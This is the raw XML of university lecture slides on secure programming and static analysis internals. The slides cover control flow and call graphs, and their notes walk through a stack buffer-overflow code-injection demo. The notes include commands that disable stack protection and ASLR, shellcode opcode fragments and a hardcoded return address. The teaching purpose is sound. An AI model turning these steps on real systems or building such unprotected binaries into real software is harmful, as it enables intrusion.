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handoutMasterIdLst>
    <p:handoutMasterId r:id="rId65"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="263"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4" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="288" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="292" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="287" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="294" r:id="rId31"/>
    <p:sldId id="295" r:id="rId32"/>
    <p:sldId id="296" r:id="rId33"/>
    <p:sldId id="297" r:id="rId34"/>
    <p:sldId id="299" r:id="rId35"/>
    <p:sldId id="298" r:id="rId36"/>
    <p:sldId id="276" r:id="rId37"/>
    <p:sldId id="277" r:id="rId38"/>
    <p:sldId id="278" r:id="rId39"/>
    <p:sldId id="279" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="281" r:id="rId42"/>
    <p:sldId id="282" r:id="rId43"/>
    <p:sldId id="283"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98" autoAdjust="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72D88EEA-53C8-404E-901C-D372C14F418E}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014/3/11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="頁尾版面配置區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4728480C-7719-47BE-B016-4C17EA0B1F1E}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379290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12A1CCE5-003C-49CB-8D42-F46B551FCAC9}" type="datetimeFigureOut">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2014/3/11</a:t>
            </a:fld>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0AE2A152-40CE-4D06-85FF-23A81DB8D70C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2798682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How to write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>http://dirk.liveforchrist.tw/wiki/index.php/%E9%A6%96%E9%A0%81</a:t>
            </a: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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1875629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None/>
            </a:pP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55</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310184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56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3253658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58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="312134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None/>
            </a:pP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59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215952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60</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112219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62</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389954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None/>
            </a:pP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45</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100258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dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ggdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-stack-protector -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bfsucc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>bfsucc.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="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46</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186849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dirty="0" smtClean="0"/>
              <a:t>Can also execute shell,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> such as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>bash.</a:t>
            </a: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47</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3495476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48</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263411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1. See</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>opcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> begins at line 0    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>eb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 16 5e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 31 62 …</a:t>
            </a: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49</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29403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dirty="0" smtClean="0"/>
              <a:t>Write the shell code into the file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>exploitsucc.bin.</a:t>
            </a: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50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241442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baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t> begins at $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" baseline="0" dirty="0" smtClean="0"/>
              <a:t>, i.e., 0xbffff1d0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In the C program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\xd0\xf1\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xbf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2817981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8600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note: echo 0 &gt; /proc/sys/kernel/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>randomize_va_space</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1200" kern="1200" dirty="0" smtClean="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2AA7ABCD-D73F-4C2D-A5AB-A0C5BF21C638}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74182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4F6144B6-6428-43A1-B41E-BB2885AF3352}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</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DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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BB8C0E8-1548-4E56-ABA7-C35B41DB8801}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11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F26525-081F-4A1F-B92B-C5DAB6680A3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E2D51B6-78B0-4586-A85C-A232556DE053}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11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DF26525-081F-4A1F-B92B-C5DAB6680A3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cap="none" baseline="0"/>
            </a:lvl1p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27C90DF8-B060-4279-857C-9A9B2FA52FE5}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="投影片編號版面配置區 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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C1668258-EE83-489C-A53D-90BB061EF0CF}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</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DDF26525-081F-4A1F-B92B-C5DAB6680A3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5881396-2817-4421-A9EB-B054DE4FEDB0}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11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DF26525-081F-4A1F-B92B-C5DAB6680A3D}"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17F548BD-65B0-4356-9B5C-926D3D1994A8}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11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DF26525-081F-4A1F-B92B-C5DAB6680A3D}"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F5CC93C9-3591-4E56-A71C-24850F560432}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="投影片編號版面配置區 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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C58BA94-CE1B-42BE-A837-62AF0BBAF71C}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11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DF26525-081F-4A1F-B92B-C5DAB6680A3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001C7626-34C4-4D99-B4D3-6FAF51685D8B}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="投影片編號版面配置區 21"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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FCC0C22B-95AD-48B3-84C4-536AE429A84D}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="投影片編號版面配置區 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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A4D7C72-DA3E-4C19-9BDE-5A5D0AEEE313}" type="datetime1">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2014/3/11</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F26525-081F-4A1F-B92B-C5DAB6680A3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adishi.com/basic-shellcode-examp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youtube.com/watch?v=RF7DF4kfs1E"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securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standard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ecurecoding.cert.org/confluence/display/seccode/Top+10+Secure+Coding+Pract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sz="4000" dirty="0" smtClean="0"/>
              <a:t>Secure Programming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>4. Static Analysis Internals (Including BO Code Injection Example)</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p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Chih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Hung Wang</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文字方塊 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627784" y="4149080"/>
            <a:ext cx="5904656" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>1. B. Chess and J. West, Secure Programming with Static Analysis, Addison-Wesley, 2007.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>2. R. C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Seacord</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, Secure Coding in C and C++, Addison-Wesley,  2006.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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Control Flow (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Many static analysis algorithms (and compiler optimization techniques) explore the different execution paths that can take place when a function is executed. To make these algorithms efficient, most tools build a control flow graph on top of the AST or intermediate representation.</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10</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1331640" y="4077071"/>
            <a:ext cx="6112406" cy="252028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Control Flow (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A control flow graph with four basic blocks </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11</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899592" y="2348880"/>
            <a:ext cx="6927981" cy="38884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Control Flow (3)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A call graph represents potential control flow between functions or methods.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12</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539552" y="2492896"/>
            <a:ext cx="5372100" cy="2962275"/>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419872" y="4005064"/>
            <a:ext cx="4701127" cy="2592288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0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Control Flow (4)</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13</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691680" y="1700808"/>
            <a:ext cx="5040560" cy="444019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Dataflow (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
